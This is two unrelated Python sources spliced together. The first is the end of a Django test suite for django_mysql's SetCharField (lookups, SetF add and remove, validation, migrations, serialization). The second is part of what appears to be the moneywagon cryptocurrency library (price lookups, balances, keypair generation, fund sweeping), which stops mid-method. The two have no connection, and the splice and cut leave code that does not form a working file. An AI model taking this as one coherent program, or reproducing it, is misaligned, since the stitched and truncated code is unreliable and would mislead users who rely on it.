        assert mouldy[0] == mymodel
        rotten = CharSetModel.objects.filter(**{lname: "rotten"})
        assert rotten.count() == 1
        assert rotten[0] == mymodel
        clean = CharSetModel.objects.filter(**{lname: "clean"})
        assert clean.count() == 0
        # Membership lookups take a single value, not a set.
        with pytest.raises(ValueError):
            list(CharSetModel.objects.filter(**{lname: {"a", "b"}}))
        both = CharSetModel.objects.filter(
            Q(**{lname: "mouldy"}) & Q(**{lname: "rotten"})
        )
        assert both.count() == 1
        assert both[0] == mymodel
        either = CharSetModel.objects.filter(
            Q(**{lname: "mouldy"}) | Q(**{lname: "clean"})
        )
        assert either.count() == 1
        not_clean = CharSetModel.objects.exclude(**{lname: "clean"})
        assert not_clean.count() == 1
        not_mouldy = CharSetModel.objects.exclude(**{lname: "mouldy"})
        assert not_mouldy.count() == 0
    def test_char_len_lookup_empty(self):
        mymodel = CharSetModel.objects.create(field=set())
        empty = CharSetModel.objects.filter(field__len=0)
        assert empty.count() == 1
        assert empty[0] == mymodel
        one = CharSetModel.objects.filter(field__len=1)
        assert one.count() == 0
        one_or_more = CharSetModel.objects.filter(field__len__gte=0)
        assert one_or_more.count() == 1
    def test_char_len_lookup(self):
        mymodel = CharSetModel.objects.create(field={"red", "expensive"})
        empty = CharSetModel.objects.filter(field__len=0)
        assert empty.count() == 0
        one_or_more = CharSetModel.objects.filter(field__len__gte=1)
        assert one_or_more.count() == 1
        assert one_or_more[0] == mymodel
        two = CharSetModel.objects.filter(field__len=2)
        assert two.count() == 1
        assert two[0] == mymodel
        three = CharSetModel.objects.filter(field__len=3)
        assert three.count() == 0
    def test_char_default(self):
        # The model-level default set survives creation and reload.
        mymodel = CharSetDefaultModel.objects.create()
        assert mymodel.field == {"a", "d"}
        mymodel = CharSetDefaultModel.objects.get(id=mymodel.id)
        assert mymodel.field == {"a", "d"}
    def test_int_easy(self):
        mymodel = IntSetModel.objects.create(field={1, 2})
        assert mymodel.field == {1, 2}
        mymodel = IntSetModel.objects.get(id=mymodel.id)
        assert mymodel.field == {1, 2}
    def test_int_contains_lookup(self):
        onetwo = IntSetModel.objects.create(field={1, 2})
        ones = IntSetModel.objects.filter(field__contains=1)
        assert ones.count() == 1
        assert ones[0] == onetwo
        twos = IntSetModel.objects.filter(field__contains=2)
        assert twos.count() == 1
        assert twos[0] == onetwo
        threes = IntSetModel.objects.filter(field__contains=3)
        assert threes.count() == 0
        # As with char sets, contains takes a single value only.
        with pytest.raises(ValueError):
            list(IntSetModel.objects.filter(field__contains={1, 2}))
        ones_and_twos = IntSetModel.objects.filter(
            Q(field__contains=1) & Q(field__contains=2)
        )
        assert ones_and_twos.count() == 1
        assert ones_and_twos[0] == onetwo
        ones_and_threes = IntSetModel.objects.filter(
            Q(field__contains=1) & Q(field__contains=3)
        )
        assert ones_and_threes.count() == 0
        ones_or_threes = IntSetModel.objects.filter(
            Q(field__contains=1) | Q(field__contains=3)
        )
        assert ones_or_threes.count() == 1
        no_three = IntSetModel.objects.exclude(field__contains=3)
        assert no_three.count() == 1
        no_one = IntSetModel.objects.exclude(field__contains=1)
        assert no_one.count() == 0
class TestSetF(TestCase):
    """Behaviour of the SetF expression: atomic add/remove of members
    performed in SQL via queryset update() or attribute assignment."""
    def test_add_to_none(self):
        CharSetModel.objects.create(field=set())
        CharSetModel.objects.update(field=SetF("field").add("first"))
        model = CharSetModel.objects.get()
        assert model.field == {"first"}
    def test_add_to_one(self):
        CharSetModel.objects.create(field={"big"})
        CharSetModel.objects.update(field=SetF("field").add("bad"))
        model = CharSetModel.objects.get()
        assert model.field == {"big", "bad"}
    def test_add_to_some(self):
        CharSetModel.objects.create(field={"big", "blue"})
        CharSetModel.objects.update(field=SetF("field").add("round"))
        model = CharSetModel.objects.get()
        assert model.field == {"big", "blue", "round"}
    def test_add_to_multiple_objects(self):
        # A single update() applies the add to every matched row.
        CharSetModel.objects.create(field={"mouse"})
        CharSetModel.objects.create(field={"keyboard"})
        CharSetModel.objects.update(field=SetF("field").add("screen"))
        first, second = tuple(CharSetModel.objects.all())
        assert first.field == {"mouse", "screen"}
        assert second.field == {"keyboard", "screen"}
    def test_add_exists(self):
        # Adding an existing member is a no-op (set semantics).
        CharSetModel.objects.create(field={"nice"})
        CharSetModel.objects.update(field=SetF("field").add("nice"))
        model = CharSetModel.objects.get()
        assert model.field == {"nice"}
    def test_add_expression(self):
        # add() also accepts database expressions, not just literals.
        CharSetModel.objects.create(field={"a"})
        CharSetModel.objects.update(field=SetF("field").add(Value("b")))
        model = CharSetModel.objects.get()
        assert model.field == {"a", "b"}
    @override_mysql_variables(SQL_MODE="ANSI")
    def test_add_works_in_ansi_mode(self):
        # ANSI mode changes MySQL quoting rules; SetF SQL must still work.
        CharSetModel.objects.create()
        CharSetModel.objects.update(field=SetF("field").add("big"))
        CharSetModel.objects.update(field=SetF("field").add("bad"))
        model = CharSetModel.objects.get()
        assert model.field == {"big", "bad"}
    def test_add_assignment(self):
        # SetF can be assigned to the attribute and resolved on save().
        model = CharSetModel.objects.create(field={"red"})
        model.field = SetF("field").add("blue")
        model.save()
        model = CharSetModel.objects.get()
        assert model.field == {"red", "blue"}
    def test_remove_one(self):
        CharSetModel.objects.create(field={"dopey", "knifey"})
        CharSetModel.objects.update(field=SetF("field").remove("knifey"))
        model = CharSetModel.objects.get()
        assert model.field == {"dopey"}
    def test_remove_only_one(self):
        CharSetModel.objects.create(field={"pants"})
        CharSetModel.objects.update(field=SetF("field").remove("pants"))
        model = CharSetModel.objects.get()
        assert model.field == set()
    def test_remove_from_none(self):
        CharSetModel.objects.create(field=set())
        CharSetModel.objects.update(field=SetF("field").remove("jam"))
        model = CharSetModel.objects.get()
        assert model.field == set()
    def test_remove_first(self):
        # Position within the stored comma-separated string must not matter.
        CharSetModel.objects.create()
        CharSetModel.objects.update(field="a,b,c")
        CharSetModel.objects.update(field=SetF("field").remove("a"))
        model = CharSetModel.objects.get()
        assert model.field == {"b", "c"}
    def test_remove_middle(self):
        CharSetModel.objects.create()
        CharSetModel.objects.update(field="a,b,c")
        CharSetModel.objects.update(field=SetF("field").remove("b"))
        model = CharSetModel.objects.get()
        assert model.field == {"a", "c"}
    def test_remove_last(self):
        CharSetModel.objects.create()
        CharSetModel.objects.update(field="a,b,c")
        CharSetModel.objects.update(field=SetF("field").remove("c"))
        model = CharSetModel.objects.get()
        assert model.field == {"a", "b"}
    def test_remove_not_exists(self):
        CharSetModel.objects.create(field={"nice"})
        CharSetModel.objects.update(field=SetF("field").remove("naughty"))
        model = CharSetModel.objects.get()
        assert model.field == {"nice"}
    def test_remove_expression(self):
        CharSetModel.objects.create(field={"a"})
        CharSetModel.objects.update(field=SetF("field").remove(Value("a")))
        model = CharSetModel.objects.get()
        assert model.field == set()
    def test_remove_from_multiple_objects(self):
        CharSetModel.objects.create(field={"mouse", "chair"})
        CharSetModel.objects.create(field={"keyboard", "chair"})
        CharSetModel.objects.update(field=SetF("field").remove("chair"))
        first, second = tuple(CharSetModel.objects.all())
        assert first.field == {"mouse"}
        assert second.field == {"keyboard"}
    @override_mysql_variables(SQL_MODE="ANSI")
    def test_remove_works_in_ansi_mode(self):
        CharSetModel.objects.create(field={"bold"})
        CharSetModel.objects.update(field=SetF("field").remove("big"))
        CharSetModel.objects.update(field=SetF("field").remove("bold"))
        CharSetModel.objects.update(field=SetF("field").remove("bad"))
        model = CharSetModel.objects.get()
        assert model.field == set()
    def test_remove_assignment(self):
        model = IntSetModel.objects.create(field={24, 89})
        model.field = SetF("field").remove(89)
        model.save()
        model = IntSetModel.objects.get()
        assert model.field == {24}
    def test_works_with_two_fields(self):
        # Two SetF expressions on different columns in one update() must
        # not interfere with each other.
        CharSetModel.objects.create(
            field={"snickers", "lion"}, field2={"apple", "orange"}
        )
        # Concurrent add
        CharSetModel.objects.update(
            field=SetF("field").add("mars"), field2=SetF("field2").add("banana")
        )
        model = CharSetModel.objects.get()
        assert model.field == {"snickers", "lion", "mars"}
        assert model.field2 == {"apple", "orange", "banana"}
        # Concurrent add and remove
        CharSetModel.objects.update(
            field=SetF("field").add("reeses"), field2=SetF("field2").remove("banana")
        )
        model = CharSetModel.objects.get()
        assert model.field == {"snickers", "lion", "mars", "reeses"}
        assert model.field2 == {"apple", "orange"}
        # Swap
        CharSetModel.objects.update(
            field=SetF("field").remove("lion"), field2=SetF("field2").remove("apple")
        )
        model = CharSetModel.objects.get()
        assert model.field == {"snickers", "mars", "reeses"}
        assert model.field2 == {"orange"}
class TestValidation(SimpleTestCase):
    """Validation of the ``size`` constraint on SetCharField."""

    def test_max_length(self):
        set_field = SetCharField(models.CharField(max_length=32), size=3, max_length=32)
        # A set exactly at the size limit passes cleanly.
        set_field.clean({"a", "b", "c"}, None)
        # One element over the limit raises with a descriptive message.
        with pytest.raises(exceptions.ValidationError) as excinfo:
            set_field.clean({"a", "b", "c", "d"}, None)
        message = excinfo.value.messages[0]
        assert message == "Set contains 4 items, it should contain no more than 3."
@isolate_apps("tests.testapp")
class TestCheck(SimpleTestCase):
    """System-check errors emitted for invalid SetCharField declarations."""
    def test_model_set(self):
        field = IntSetModel._meta.get_field("field")
        assert field.model == IntSetModel
        # I think this is a side effect of migrations being run in tests -
        # the base_field.model is the __fake__ model
        assert field.base_field.model.__name__ == "IntSetModel"
    def test_base_field_checks(self):
        # A base CharField without max_length propagates as E001.
        class Invalid(models.Model):
            field = SetCharField(models.CharField(), max_length=32)
        errors = Invalid.check()
        assert len(errors) == 1
        assert errors[0].id == "django_mysql.E001"
        assert "Base field for set has errors" in errors[0].msg
        assert "max_length" in errors[0].msg
    def test_invalid_base_fields(self):
        # Relational base fields are not allowed at all (E002).
        class Invalid(models.Model):
            field = SetCharField(
                models.ForeignKey("testapp.Author", on_delete=models.CASCADE),
                max_length=32,
            )
        errors = Invalid.check()
        assert len(errors) == 1
        assert errors[0].id == "django_mysql.E002"
        assert "Base field for set must be" in errors[0].msg
    def test_max_length_including_base(self):
        # size * (base max_length + separator) can exceed the column's
        # max_length (E003).
        class Invalid(models.Model):
            field = SetCharField(models.CharField(max_length=32), size=2, max_length=32)
        errors = Invalid.check()
        assert len(errors) == 1
        assert errors[0].id == "django_mysql.E003"
        assert "Field can overrun" in errors[0].msg
    def test_max_length_missing_doesnt_crash(self):
        # Only Django's own CharField check fires; our checks stay silent.
        class Invalid(models.Model):
            field = SetCharField(models.CharField(max_length=2), size=2)
        errors = Invalid.check()
        assert len(errors) == 1
        assert errors[0].id == "fields.E120"
        assert errors[0].msg == "CharFields must define a 'max_length' attribute."
class TestDeconstruct(TestCase):
    """deconstruct() must round-trip the field and serialize for migrations."""
    def test_deconstruct(self):
        field = SetCharField(models.IntegerField(), max_length=32)
        name, path, args, kwargs = field.deconstruct()
        new = SetCharField(*args, **kwargs)
        assert new.base_field.__class__ == field.base_field.__class__
    def test_deconstruct_with_size(self):
        field = SetCharField(models.IntegerField(), size=3, max_length=32)
        name, path, args, kwargs = field.deconstruct()
        new = SetCharField(*args, **kwargs)
        assert new.size == field.size
    def test_deconstruct_args(self):
        field = SetCharField(models.CharField(max_length=5), max_length=32)
        name, path, args, kwargs = field.deconstruct()
        new = SetCharField(*args, **kwargs)
        assert new.base_field.max_length == field.base_field.max_length
    def test_makemigrations(self):
        field = SetCharField(models.CharField(max_length=5), max_length=32)
        statement, imports = MigrationWriter.serialize(field)
        # The order of the output max_length/size statements varies by
        # python version, hence a little regexp to match them
        assert re.compile(
            r"""^django_mysql\.models\.SetCharField\(
                models\.CharField\(max_length=5\),\ # space here
                (
                    max_length=32,\ size=None|
                    size=None,\ max_length=32
                )
                \)$
            """,
            re.VERBOSE,
        ).match(statement)
class TestMigrationWriter(TestCase):
    """Migration serialization when an explicit ``size`` is set."""
    def test_makemigrations_with_size(self):
        field = SetCharField(models.CharField(max_length=5), max_length=32, size=5)
        statement, imports = MigrationWriter.serialize(field)
        # The order of the output max_length/size statements varies by
        # python version, hence a little regexp to match them
        assert re.compile(
            r"""^django_mysql\.models\.SetCharField\(
                models\.CharField\(max_length=5\),\ # space here
                (
                    max_length=32,\ size=5|
                    size=5,\ max_length=32
                )
                \)$
            """,
            re.VERBOSE,
        ).match(statement)
class TestMigrations(TransactionTestCase):
    """Applying and unapplying a migration that adds a set field with a
    default value."""
    # Point the migration loader at a purpose-built migration set.
    @override_settings(
        MIGRATION_MODULES={"testapp": "tests.testapp.set_default_migrations"}
    )
    def test_adding_field_with_default(self):
        table_name = "testapp_intsetdefaultmodel"
        table_names = connection.introspection.table_names
        # Before migrating, the table must not exist.
        with connection.cursor() as cursor:
            assert table_name not in table_names(cursor)
        call_command(
            "migrate", "testapp", verbosity=0, skip_checks=True, interactive=False
        )
        with connection.cursor() as cursor:
            assert table_name in table_names(cursor)
        # Rolling back to zero drops the table again.
        call_command(
            "migrate",
            "testapp",
            "zero",
            verbosity=0,
            skip_checks=True,
            interactive=False,
        )
        with connection.cursor() as cursor:
            assert table_name not in table_names(cursor)
class TestSerialization(SimpleTestCase):
    """JSON (de)serialization of set fields via Django's serializers."""
    def test_dumping(self):
        instance = CharSetModel(field={"big", "comfy"})
        data = json.loads(serializers.serialize("json", [instance]))[0]
        field = data["fields"]["field"]
        # Member order inside the comma-joined string is unspecified.
        assert sorted(field.split(",")) == ["big", "comfy"]
    def test_loading(self):
        test_data = """
        [{"fields": {"field": "big,leather,comfy"},
        "model": "testapp.CharSetModel", "pk": null}]
        """
        objs = list(serializers.deserialize("json", test_data))
        instance = objs[0].object
        assert instance.field == {"big", "leather", "comfy"}
class TestDescription(SimpleTestCase):
    """The human-readable description reflects the base field's type."""

    def test_char(self):
        char_set = SetCharField(models.CharField(max_length=5), max_length=32)
        assert char_set.description == "Set of String (up to %(max_length)s)"

    def test_int(self):
        int_set = SetCharField(models.IntegerField(), max_length=32)
        assert int_set.description == "Set of Integer"
class TestFormField(SimpleTestCase):
    """formfield() must yield a SimpleSetField mirroring the model field."""

    def test_model_field_formfield(self):
        model_field = SetCharField(models.CharField(max_length=27))
        produced = model_field.formfield()
        assert isinstance(produced, SimpleSetField)
        # The inner form field mirrors the model's base field.
        assert isinstance(produced.base_field, forms.CharField)
        assert produced.base_field.max_length == 27

    def test_model_field_formfield_size(self):
        model_field = SetCharField(models.IntegerField(), size=4)
        produced = model_field.formfield()
        assert isinstance(produced, SimpleSetField)
        # The set's size constraint maps onto the form field's max_length.
        assert produced.max_length == 4
| |
from __future__ import print_function
import sys
from binascii import hexlify
from tabulate import tabulate
import hashlib
from base58 import b58decode_check
from .core import (
AutoFallbackFetcher, enforce_service_mode, get_optimal_services, get_magic_bytes,
RevertToPrivateMode, CurrencyNotSupported, NoService, NoServicesDefined
)
from .historical_price import Quandl
from .crypto_data import crypto_data
from bitcoin import sha256, pubtoaddr, privtopub, encode_privkey, encode_pubkey, privkey_to_address
# Flag for Python 2 / Python 3 branching elsewhere in the module.
# Comparing the major version component directly is clearer and more robust
# than the previous ordered tuple comparison `sys.version_info <= (3, 0)`,
# which relied on the full 5-tuple always sorting above a bare (3, 0).
is_py2 = sys.version_info[0] == 2
class CompositeResponse(object):
    """Bundles the raw HTTP responses of two services into a single
    response-like object keyed by service name."""

    def __init__(self, service1, service2):
        self.service1 = service1
        self.service2 = service2

    def json(self):
        combined = {}
        for svc in (self.service1, self.service2):
            combined[svc.name] = svc.last_raw_response.json()
        return combined
class CompositeService(object):
    """
    Mimics the Service class for price fetches that had to combine two
    different price sources (crypto -> intermediate -> fiat).  Only used
    when invoking `report_services`.
    """

    def __init__(self, services1, services2, via):
        primary = services1[0]
        secondary = services2[0]
        self.name = "%s -> %s (via %s)" % (
            primary.name, secondary.name, via.upper()
        )
        self.last_url = "%s, %s" % (primary.last_url, secondary.last_url)
        self.last_raw_response = CompositeResponse(primary, secondary)
        self.service_id = "%d+%d" % (primary.service_id, secondary.service_id)

    def __repr__(self):
        return "<Composite Service: %s>" % self.name
def _try_price_fetch(services, args, modes):
    """Attempt a CurrentPrice fetch; return the NoService exception (rather
    than raising it) so callers can fall through to other strategies."""
    try:
        result = enforce_service_mode(
            services, CurrentPrice, args, modes=modes
        )
    except NoService as exc:
        return exc
    return result
def get_current_price(crypto, fiat, services=None, convert_to=None, helper_prices=None, **modes):
    """
    High level function for getting current exchange rate for a cryptocurrency.
    If the fiat value is not explicitly defined, it will try the wildcard service.
    if that does not work, it tries converting to an intermediate cryptocurrency
    if available.
    """
    fiat = fiat.lower()
    args = {'crypto': crypto, 'fiat': fiat, 'convert_to': convert_to}
    if not services:
        services = get_optimal_services(crypto, 'current_price')
    if fiat in services:
        # first, try service with explicit fiat support
        try_services = services[fiat]
        result = _try_price_fetch(try_services, args, modes)
        if not isinstance(result, Exception):
            return result
    if '*' in services:
        # then try wildcard service
        try_services = services['*']
        result = _try_price_fetch(try_services, args, modes)
        if not isinstance(result, Exception):
            return result
    def _do_composite_price_fetch(crypto, convert_crypto, fiat, helpers, modes):
        # Price crypto -> convert_crypto, then convert_crypto -> fiat, and
        # multiply the two rates.  report_services is forced on for the
        # recursive calls so both service lists come back, then restored.
        before = modes.get('report_services', False)
        modes['report_services'] = True
        services1, converted_price = get_current_price(crypto, convert_crypto, **modes)
        if not helpers or convert_crypto not in helpers[fiat]:
            services2, fiat_price = get_current_price(convert_crypto, fiat, **modes)
        else:
            # Caller pre-fetched this intermediate->fiat rate.
            services2, fiat_price = helpers[fiat][convert_crypto]
        modes['report_services'] = before
        if modes.get('report_services', False):
            serv = CompositeService(services1, services2, convert_crypto)
            return [serv], converted_price * fiat_price
        else:
            return converted_price * fiat_price
    # Finally, try pricing through an intermediate cryptocurrency.
    for composite_attempt in ['btc', 'ltc', 'doge', 'uno']:
        if composite_attempt in services and services[composite_attempt]:
            result = _do_composite_price_fetch(
                crypto, composite_attempt, fiat, helper_prices, modes
            )
            if not isinstance(result, Exception):
                return result
    # NOTE(review): if no branch above ever assigned ``result`` (no fiat
    # match, no wildcard, no usable composite currency) this raises
    # NameError instead of a NoService error — confirm intended.
    raise result
def get_fiat_exchange_rate(from_fiat, to_fiat):
    """Return the exchange rate between two fiat currencies."""
    # Imported lazily to avoid a circular import at module load time.
    from moneywagon.services import FreeCurrencyConverter
    converter = FreeCurrencyConverter()
    return converter.get_fiat_exchange_rate(from_fiat, to_fiat)
def get_address_balance(crypto, address=None, addresses=None, services=None, **modes):
    """
    Get the balance for a single address or a list of addresses.
    Exactly one of ``address`` or ``addresses`` must be supplied (if both are
    given, ``address`` wins). Extra keyword arguments are fetching modes.
    """
    if not services:
        services = get_optimal_services(crypto, 'address_balance')

    args = {'crypto': crypto}
    if address:
        args['address'] = address
    elif addresses:
        args['addresses'] = addresses
    else:
        # Fix: the old message said "but not both", which described the wrong
        # failure -- this branch fires when *neither* argument is given.
        raise Exception("Either address or addresses is required")

    results = enforce_service_mode(
        services, AddressBalance, args, modes=modes
    )
    if modes.get('private') and addresses:
        # private mode indexes balances by address; add a convenience total
        results['total_balance'] = sum(results.values())

    if modes.get('private') and modes.get('report_services', False):
        # private mode does not return services (its not practical),
        # an empty list is returned in its place to simplify the API.
        return [], results
    return results
def get_historical_transactions(crypto, address=None, addresses=None, services=None, **modes):
    """
    Get the transaction history for an address (or list of addresses),
    newest first. Extra keyword arguments are fetching modes.
    """
    if not services:
        services = get_optimal_services(crypto, 'historical_transactions')

    kwargs = {'crypto': crypto}
    if addresses:
        kwargs['addresses'] = addresses
    if address:
        kwargs['address'] = address

    try:
        txs = enforce_service_mode(
            services, HistoricalTransactions, kwargs, modes=modes
        )
    except RevertToPrivateMode:
        # no services implement get_historical_transactions_multi...
        modes['private'] = 1
        if modes.get('verbose'):
            print("Can't make with single API call. Retrying with private mode")
        txs = enforce_service_mode(
            services, HistoricalTransactions, kwargs, modes=modes
        )

    if modes.get('private'):
        # private mode returns items indexed by address; flatten into a single
        # list (the per-address indexing only makes sense for balances).
        # Fix: was a side-effect list comprehension ([l.extend(x) for ...]).
        flattened = []
        for address_txs in txs.values():
            flattened.extend(address_txs)
        txs = sorted(flattened, key=lambda tx: tx['date'], reverse=True)

        # private mode may return duplicate txs (one per address involved);
        # keep the first occurrence. Fix: membership test now uses a set
        # instead of scanning a list (was O(n^2)).
        seen_txids = set()
        deduped = []
        for tx in txs:
            if tx['txid'] in seen_txids:
                continue
            seen_txids.add(tx['txid'])
            deduped.append(tx)
        txs = deduped

    if modes.get('report_services', False):
        # private mode does not return services (its not practical),
        # an empty list is returned in its place to simplify the API.
        return [], txs

    return txs
def get_single_transaction(crypto, txid, services=None, **modes):
    """
    Fetch the details of a single transaction by txid.
    Extra keyword arguments are fetching modes.
    """
    chosen = services or get_optimal_services(crypto, 'single_transaction')
    return enforce_service_mode(
        chosen, SingleTransaction, {'crypto': crypto, 'txid': txid}, modes=modes
    )
def get_unspent_outputs(crypto, address=None, addresses=None, services=None, **modes):
    """
    Get the unspent outputs (UTXOs) for an address or list of addresses,
    sorted by output. Extra keyword arguments are fetching modes.
    """
    if not services:
        services = get_optimal_services(crypto, 'unspent_outputs')

    kwargs = {'crypto': crypto}
    if addresses:
        kwargs['addresses'] = addresses
    if address:
        kwargs['address'] = address

    try:
        utxos = enforce_service_mode(
            services, UnspentOutputs, kwargs, modes=modes
        )
    except RevertToPrivateMode:
        # no services implement get_unspent_outputs_multi...
        modes['private'] = 1
        if modes.get('verbose'):
            print("Can't make with single API call. Retrying with private mode")
        utxos = enforce_service_mode(
            services, UnspentOutputs, kwargs, modes=modes
        )

    if modes.get('private'):
        # private mode returns items indexed by address; flatten into one list
        # (per-address indexing only makes sense for address balances).
        # Fix: was a side-effect list comprehension ([l.extend(x) for ...]).
        flattened = []
        for address_utxos in utxos.values():
            flattened.extend(address_utxos)
        utxos = sorted(flattened, key=lambda utxo: utxo['output'])

    if modes.get('report_services', False):
        # private mode does not return services (its not practical),
        # an empty list is returned in its place to satisfy the API.
        return [], utxos

    return utxos
def get_historical_price(crypto, fiat, date):
    """
    Return the price of `crypto` in `fiat` at `date`. Only one service
    implements historical prices, so no fetching modes are needed.
    """
    fetcher = HistoricalPrice()
    return fetcher.action(crypto, fiat, date)
def push_tx(crypto, tx_hex, services=None, **modes):
    """Broadcast a raw (hex-encoded) transaction to the network."""
    chosen = services or get_optimal_services(crypto, 'push_tx')
    return enforce_service_mode(
        chosen, PushTx, {'crypto': crypto, 'tx_hex': tx_hex}, modes=modes
    )
def get_block(crypto, block_number=None, block_hash=None, latest=False, services=None, **modes):
    """Fetch a block by number, by hash, or the latest block."""
    chosen = services or get_optimal_services(crypto, 'get_block')
    args = {
        'crypto': crypto,
        'block_number': block_number,
        'block_hash': block_hash,
        'latest': latest,
    }
    return enforce_service_mode(chosen, GetBlock, args, modes=modes)
def get_optimal_fee(crypto, tx_bytes, **modes):
    """
    Get the optimal fee based on how big the transaction is. Currently this
    is only provided for BTC. Other currencies will return $0.02 in satoshi.
    """
    try:
        services = get_optimal_services(crypto, 'get_optimal_fee')
    except NoServicesDefined:
        # No fee service for this coin: approximate a flat $0.02 fee,
        # converted to satoshis via the coin's current USD price.
        usd_price = get_current_price(crypto, 'usd')
        flat_fee = int(0.02 / usd_price * 1e8)
        if modes.get('report_services'):
            return [None], flat_fee
        return flat_fee

    result = enforce_service_mode(
        services, OptimalFee, dict(crypto=crypto, tx_bytes=tx_bytes), modes=modes
    )
    if modes.get('report_services'):
        used_services, fee = result
        return used_services, int(fee)
    return int(result)
def get_onchain_exchange_rates(deposit_crypto=None, withdraw_crypto=None, **modes):
    """
    Gets exchange rates for all defined on-chain exchange services,
    optionally filtered by deposit and/or withdraw currency. With
    best=True, only the single highest rate is returned.
    """
    from moneywagon.onchain_exchange import ALL_SERVICES
    verbose = modes.get('verbose', False)

    rates = []
    for Service in ALL_SERVICES:
        rates.extend(Service(verbose=verbose).onchain_exchange_rates())

    if deposit_crypto:
        code = deposit_crypto.upper()
        rates = [r for r in rates if r['deposit_currency']['code'] == code]
    if withdraw_crypto:
        code = withdraw_crypto.upper()
        rates = [r for r in rates if r['withdraw_currency']['code'] == code]

    if modes.get('best', False):
        return max(rates, key=lambda r: float(r['rate']))
    return rates
def generate_keypair(crypto, seed, password=None):
    """
    Generate a private key and publickey for any currency, given a seed.
    That seed can be random, or a brainwallet phrase.
    """
    if crypto in ['eth', 'etc']:
        raise CurrencyNotSupported("Ethereums not yet supported")

    pub_byte, priv_byte = get_magic_bytes(crypto)

    priv_key = sha256(seed)
    pub_key = privtopub(priv_key)
    compressed_pub = encode_pubkey(pub_key, 'hex_compressed')

    wif = encode_privkey(priv_key, 'wif_compressed', vbyte=priv_byte)
    if password:
        # pycrypto etc. must be installed or this will raise ImportError, hence inline import.
        from .bip38 import Bip38EncryptedPrivateKey
        wif = str(Bip38EncryptedPrivateKey.encrypt(crypto, wif, password))

    keypair = {
        'public': {
            'hex_uncompressed': pub_key,
            'hex': compressed_pub,
            'address': pubtoaddr(compressed_pub, pub_byte),
        },
        'private': {
            'wif': wif,
        },
    }

    if not password:
        # only these are valid when no bip38 password is supplied
        priv_section = keypair['private']
        priv_section['hex'] = encode_privkey(priv_key, 'hex_compressed', vbyte=priv_byte)
        priv_section['hex_uncompressed'] = encode_privkey(priv_key, 'hex', vbyte=priv_byte)
        priv_section['wif_uncompressed'] = encode_privkey(priv_key, 'wif', vbyte=priv_byte)

    return keypair
def wif_to_address(crypto, wif):
    # Derive the public address for a WIF-encoded private key.
    # NOTE(review): this function is shadowed by a second `wif_to_address`
    # definition later in this module (which also validates the WIF prefix
    # byte), so this earlier version is dead code after import.
    # NOTE(review): `crypto` is not lowercased here, unlike the later version.
    try:
        return privkey_to_address(wif, crypto_data[crypto]['address_version_byte'])
    except KeyError:
        # unknown currency key in crypto_data
        raise CurrencyNotSupported("Currency not yet supported")
def sweep(crypto, private_key, to_address, fee=None, password=None, **modes):
    """
    Move all funds by private key to another address.
    """
    from moneywagon.tx import Transaction
    transaction = Transaction(crypto, verbose=modes.get('verbose', False))
    transaction.add_inputs(private_key=private_key, password=password, **modes)
    # sending everything: the destination is simply the change address
    transaction.change_address = to_address
    transaction.fee(fee)
    return transaction.push()
def get_explorer_url(crypto, address=None, txid=None, blocknum=None, blockhash=None):
    """
    Build block-explorer URLs for the given address/tx/block across all
    services that define a matching URL template.
    Exactly one of address, txid, blocknum, blockhash must be passed.
    """
    context = {'crypto': crypto}
    if address:
        attr = "explorer_address_url"
        context['address'] = address
    elif txid:
        attr = "explorer_tx_url"
        context['txid'] = txid
    elif blocknum:
        attr = "explorer_blocknum_url"
        context['blocknum'] = blocknum
    elif blockhash:
        attr = "explorer_blockhash_url"
        context['blockhash'] = blockhash
    else:
        # Fix: previously fell through with `attr` unbound, raising a
        # confusing NameError inside the service loop.
        raise ValueError("one of address, txid, blocknum or blockhash is required")

    urls = []
    for service in crypto_data[crypto]['services']['address_balance']:
        template = getattr(service, attr)
        context['domain'] = service.domain
        context['protocol'] = service.protocol
        if hasattr(service, '_get_coin'):
            # used for when a service uses another name for a certain coin
            # other than the standard three letter currency code.
            context['coin'] = service._get_coin(crypto)
        if template:
            # render the explorer url template
            urls.append(template.format(**context))
    return urls
def guess_currency_from_address(address):
    """
    Given a crypto address, find which currency it likely belongs to.
    Raises an exception if it can't find a match. Raises exception if address
    is invalid.
    """
    if is_py2:
        # py2: b58decode_check returns a str; convert raw bytes to an int
        fixer = lambda x: int(x.encode('hex'), 16)
    else:
        fixer = lambda x: x # does nothing
    # version byte(s) of the base58check payload
    first_byte = fixer(b58decode_check(address)[0])
    double_first_byte = fixer(b58decode_check(address)[:2])
    # NOTE(review): on py3 indexing bytes yields an int but slicing yields
    # bytes, so `double_first_byte` stays a bytes object and can never equal
    # an integer version byte -- two-byte matching presumably only works on
    # py2. Confirm before relying on it.
    hits = []
    for currency, data in crypto_data.items():
        if hasattr(data, 'get'): # skip incomplete data listings
            version = data.get('address_version_byte', None)
            if version is not None and version in [double_first_byte, first_byte]:
                hits.append([currency, data['name']])
    if hits:
        # may return multiple matches, since version bytes are not unique
        return hits
    raise ValueError("Unknown Currency with first byte: %s" % first_byte)
class OptimalFee(AutoFallbackFetcher):
    """Fetcher returning the optimal miner fee for a transaction of `tx_bytes` bytes."""

    def action(self, crypto, tx_bytes):
        # Try each installed service's get_optimal_fee until one succeeds.
        crypto = crypto.lower()
        return self._try_services("get_optimal_fee", crypto, tx_bytes)

    def no_service_msg(self, crypto, tx_bytes):
        # Error text used when every service fails.
        return "Could not get optimal fee for: %s" % crypto
class SingleTransaction(AutoFallbackFetcher):
    """Fetcher returning the full details of a single transaction by txid."""

    def action(self, crypto, txid):
        crypto = crypto.lower()
        return self._try_services("get_single_transaction", crypto, txid)

    @classmethod
    def strip_for_consensus(cls, result):
        # Reduce a tx dict to a comparable fingerprint (total in/out to 8
        # decimal places) for cross-service consensus checks.
        return "%.8f %.8f" % (result['total_in'], result['total_out'])

    def no_service_msg(self, crypto, txid=None, txids=None):
        return "Could not get transaction info for: %s:%s" % (crypto, txid or ', '.join(txids))
class GetBlock(AutoFallbackFetcher):
    """Fetcher returning a single block by number, by hash, or 'latest'."""

    def action(self, crypto, block_number='', block_hash='', latest=False):
        # Exactly one selector must be given. block_number is tested by type
        # (not truthiness) so block 0 (genesis) counts as provided.
        if sum([type(block_number)==int, bool(block_hash), bool(latest)]) != 1:
            raise ValueError("Only one of `block_hash`, `latest`, or `block_number` allowed.")
        return self._try_services(
            'get_block', crypto, block_number=block_number, block_hash=block_hash, latest=latest
        )

    def no_service_msg(self, crypto, block_number=None, block_hash=None, latest=False):
        # Human-readable description of whichever selector was used.
        block = block_number or block_hash or ('latest' if latest else 'None')
        return "Could not get %s block: %s" % (
            crypto, block
        )

    @classmethod
    def strip_for_consensus(self, result):
